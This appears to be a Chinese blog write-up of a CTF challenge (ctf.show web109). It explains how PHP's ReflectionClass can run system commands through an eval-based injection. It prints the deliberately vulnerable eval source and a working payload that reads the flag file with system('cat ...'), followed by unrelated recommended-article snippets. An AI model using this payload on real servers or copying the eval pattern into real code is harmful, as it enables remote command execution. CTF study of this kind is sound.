php—利用反射类完成命令执行

最新推荐文章于 2023-02-10 01:33:37 发布
最新推荐文章于 2023-02-10 01:33:37 发布
阅读量392 收藏 1
点赞数
原文链接:https://www.icode9.com/content-1-762833.html
版权

原理
一、简述
ReflectionClass反射类在PHP5新加入,它可以与已定义的类建立映射关系,通过反射类可以对类操作

//定义一个类
class fuc{
static
function methond(){
	echo 'Hello World!';
	}
}
//建立fuc类的反射类
$rc = new ReflectionClass('fuc');
//通过反射类实例化fuc类
$fuc = $rc->newInstance();
//执行类方法
$fuc->method();

反射类不仅仅可以建立对类的映射,也可以建立对PHP基本方法的映射,并且返回基本方法执行的情况。因此可以通过建立反射类new ReflectionClass(system(‘cmd’))来执行命令

二、PHP源码
题目来源:ctf.show——web入门_web109

<?php 

/* 
# -*- coding: utf-8 -*- 
# @Author: h1xa 
# @Date:   2020-09-16 11:25:09 
# @Last Modified by:   h1xa 
# @Last Modified time: 2020-09-29 22:02:34 

*/ 


highlight_file(__FILE__); 
error_reporting(0); 
if(isset($_GET['v1']) && isset($_GET['v2'])){ 
    $v1 = $_GET['v1']; 
    $v2 = $_GET['v2']; 

    if(preg_match('/[a-zA-Z]+/', $v1) && preg_match('/[a-zA-Z]+/', $v2)){ 
            eval("echo new $v1($v2());"); 
    } 

} 

?>

三、方法及原理
已知了flag在./fl36dg.txt,命令执行system(‘cat fl36dg.txt’)获取flag,这里可以使用反射类new ReflectionClass()

即payload:?v1=ReflectionClass&v2=system('cat fl36dg.txt')

当新建ReflectionClass类并传入PHP代码时,会返回代码的运行结果,可以通过echo显示,即使传入了空的括号,代码依旧可以运行,且error_reporting(0)的存在阻止了报错

<?php
	error_reporting(0);
	echo new ReflectionClass(system('ls')());
?>
qq_45449318
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php-exploit:一些有趣PHP漏洞
05-28
- OS命令注入:允许攻击者执行服务器上的任意操作系统命令。 2. **跨站脚本(XSS)**: - 存储型XSS:恶意脚本被存储在服务器上,然后传递给其他用户。 - 反射型XSS:恶意脚本通过URL参数传递,仅在用户点击链接...
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
9. **CSRF(跨站请求伪造)**:攻击者可以利用CSRF诱使用户执行非预期的操作。了解如何添加CSRF令牌以保护受攻击的表单。 10. **OWASP Top Ten**:熟悉Open Web Application Security Project(OWASP)列出的十大...
利用反射执行代码
weixin_34217773的博客
06-15 134
项目组经常有用到反射执行代码的,直接上代码,大家一看就明白。 public class PrimaryKeyAttribute : Attribute { } public class DbColumnAttribute : Attribute { public string Name { get; set; } p...
java 反射执行_java反射机制执行命令
weixin_31281003的博客
02-20 490
public class Encryptor{public static void main(String[] args) throws IOException, ClassNotFoundException {String [] cmd = {"cmd","/C","calc"};Process proc = Runtime.getRuntime().exec(cmd);String.class...
java反射机制执行命令
weixin_30662539的博客
12-01 714
public class Encryptor{ public static void main(String[] args) throws IOException, ClassNotFoundException { String [] cmd = {"cmd","/C","calc"}; Process proc = Runtime.getRunt...
php反射使用
qq_34345149的博客
06-16 251
反射总结
php反射用法,php 反射用法实例代码
weixin_39760650的博客
04-01 55
反射是操纵面向对象范型中元模型的API,其功能十分强大,可帮助我们构建复杂,可扩展的应用。其用途如:自动加载插件,自动生成文档,甚至可用来扩充PHP 语言。php 反射api 由若干组成,可帮助我们用来访问程序的元数据或者同相关的注释交互。借助反射我们可以获取诸如实现了那些方法,创建一个的实例(不同于用new 创建),调用一个方法(也不同于常规调用),传递参数,动态调用的静态方法反射ap...
PHP开发漏洞环境(SQL注入+文件上传+文件下载+XSS+万能密码+session/cookie+购物逻辑漏洞的学习等等)
最新发布
05-08
1. SQL注入:当用户输入的数据未经充分过滤或转义就直接用于SQL查询时,攻击者可能利用此漏洞执行恶意SQL命令。通过构造特定的输入,攻击者可以读取、修改甚至删除数据库中的敏感数据。例如,一个不安全的登录界面...
PHP代码审核的详细介绍
12-18
防范这攻击的方法包括避免执行外部命令,使用安全函数替代,以及使用`escapeshellarg`函数转义命令参数。 **命令注入防范**应遵循以下原则: 1. 避免直接执行外部命令。 2. 使用自定义函数或库实现似功能。 3. ...
DVWA Web渗透靶机
07-31
在DVWA的相关模块中,你可以学习如何构造输入以执行非预期的系统命令。 5. **认证与会话管理**:DVWA的"Brute Force"和"Session Management"挑战涉及密码猜测攻击和会话劫持,展示了弱身份验证机制和会话管理漏洞的...
反射命令执行存在的一些问题
bring_coco的博客
02-10 186
反射命令执行存在的一些问题
php反射执行方法名,PHP反射ReflectionClassReflectionMethod使用实例
weixin_34688479的博客
03-09 205
PHP5 具有完整的反射API,添加对、接口、函数、方法和扩展进行反向工程的能力。反射是什么?它是指在PHP运行状态中,扩展分析PHP程序,导出或提取出关于方法、属性、参数等的详细信息,包括注释。这种动态获取的信息以及动态调用对象的方法的功能称为反射API。反射是操纵面向对象范型中元模型的API,其功能十分强大,可帮助我们构建复杂,可扩展的应用。其用途如:自动加载插件,自动生成文档,甚至可用...
php反射 ReflectionClass
weixin_30945039的博客
10-21 112
php反射 ReflectionClass 什么是php反射,顾名思义,可以理解为一个的映射。 举个例子: class fuc {//定义一个static function ec() {echo'我是一个';}}$class=new ReflectionClass('fuc'); //建立 fuc这个反射 echo $class; //输出这反...
php一些特性函数(ctfshow)
qq_62046696的博客
06-22 1976
preg_match()返回 pattern 的匹配次数。 它的值将是0次(不匹配)或1次,因为preg_match()在第一次匹配后 将会停止搜索。preg_match_all()不同于此,它会一直搜索subject 直到到达结尾。 如果发生错误preg_match()返回 FALSE。情况1:get方式传入num参数,然后通过preg_match判断是否存在数字,如果存在,就die,不存在的话然后intval函数判断整数,通过数组绕过preg_match,因为preg_match无法处理数组情况2:if
PHP 反射
wgchen
10-31 2200
PHP 反射
CTF技巧_Web——PHP特性_使用反射ReflectionClass执行命令
Ho1aAs‘s Blog
11-25 1650
文章目录一、简述二、PHP源码三、方法及原理 一、简述 ReflectionClass反射PHP5新加入,它可以与已定义的建立映射关系,通过反射可以对操作 //定义一个 class fuc{ static function methond(){ echo 'Hello World!'; } } //建立fuc反射 $rc = new ReflectionClass('fuc'); //通过反射实例化fuc $fuc = $rc->newInstance(); //执行方法
ctfshow-web109(PHP反射ReflectionClass、异常处理Exception)
qq_44657899的博客
11-08 1627
文章目录题目PHP反射ReflectionClassReflectionMethodPHP异常处理 Exception 题目 题目源码如下: <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-29 22:02:34 */ highlight_file(__FIL
shell(二)
weixin_34112900的博客
03-13 84
Shell 脚本转载自:http://www.imooc.com/article/11311) 如何向脚本传递参数 ?./scriptargument例子: 显示文件名称脚本./show.shfile1.txt catshow.sh #!/bin/bash echo$12) 如何在脚本中使用参数 ?第一个参数 : $1,第二个参数 : $2例子 : 脚本会复制文件(a...
php 反射执行方法,PHP 反射及用法
weixin_28796981的博客
03-10 305
class ReflectionClass implements Reflector {/* 常量 */const integer IS_IMPLICIT_ABSTRACT = 16 ;const integer IS_EXPLICIT_ABSTRACT = 32 ;const integer IS_FINAL = 64 ;/* 属性 */public $name ;/* 方法 */public ...
php echo 命令执行
08-16
### 回答1: 在 PHP 中,可以使用 `echo` 命令将字符串输出到浏览器或命令行窗口。 例如,要在浏览器中输出字符串 "Hello World!",可以使用以下代码: ```php <?php echo "Hello World!"; ?> ``` 执行此代码后,浏览器将显示 "Hello World!"。 要在命令行窗口中输出字符串,可以将上述代码保存为名为 `hello.php` 的文件,然后在命令行中运行以下命令: ``` php hello.php ``` 执行命令后,命令行窗口将显示 "Hello World!"。 ### 回答2: PHP的echo命令用于将字符串或变量的值输出到浏览器或命令行。可以在PHP脚本中使用echo命令来输出HTML代码或纯文本。 在PHP中,可以使用以下语法来使用echo命令: ```php echo "Hello World!"; ``` 上述代码将会在浏览器或命令行中输出字符串"Hello World!"。 除了输出字符串,echo命令还可以输出变量的值。例如: ```php $name = "John Doe"; echo "My name is " . $name; ``` 上述代码将会输出"My name is John Doe"。在这个例子中,使用了点操作符(.)来连接字符串和变量的值。 除了输出普通的字符串和变量的值,echo命令还可以输出HTML代码和动态生成的内容。例如: ```php $color = "red"; echo "<h1 style='color: " . $color . "'>This is a heading</h1>"; ``` 上述代码将会输出一个HTML标题(heading),并将其颜色设置为红色。 总结来说,echo命令PHP中一个用于输出字符串、变量、HTML代码和动态内容的常用命令。它可以将内容直接输出到浏览器或命令行,方便开发人员进行调试和展示。 ### 回答3: 在PHP中,`echo`是一个内置的输出语句,用于把字符串或变量输出到浏览器或命令行终端。 `echo`命令可以用来输出字符串常量,也可以用来输出包含变量的字符串。它可以输出多个参数,并且参数之间用逗号分隔。如果需要输出HTML标签,可以直接在字符串中包含HTML代码或使用HTML转义字符。 例如,以下代码演示了如何使用`echo`命令输出字符串和变量: ```php $name = "John"; $age = 25; echo "Hello World!"; // 输出字符串常量 echo "My name is " . $name . " and I am " . $age . " years old."; // 输出包含变量的字符串 ``` 执行以上代码,将会输出以下结果: ``` Hello World! My name is John and I am 25 years old. ``` 除了输出字符串和变量,`echo`命令还可以输出数组、对象和表达式的值。当输出数组或对象时,`echo`会把它们转换成字符串并输出。 需要注意的是,`echo`命令没有返回值,并且只能用于输出,不能用于赋值或条件判断。如果需要获取`echo`输出的内容,可以使用输出缓冲区的技术。 总之,PHP提供了`echo`命令用于输出字符串、变量、数组、对象和表达式的值,它是将内容发送到浏览器或命令行终端的一种简单有效的方式。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值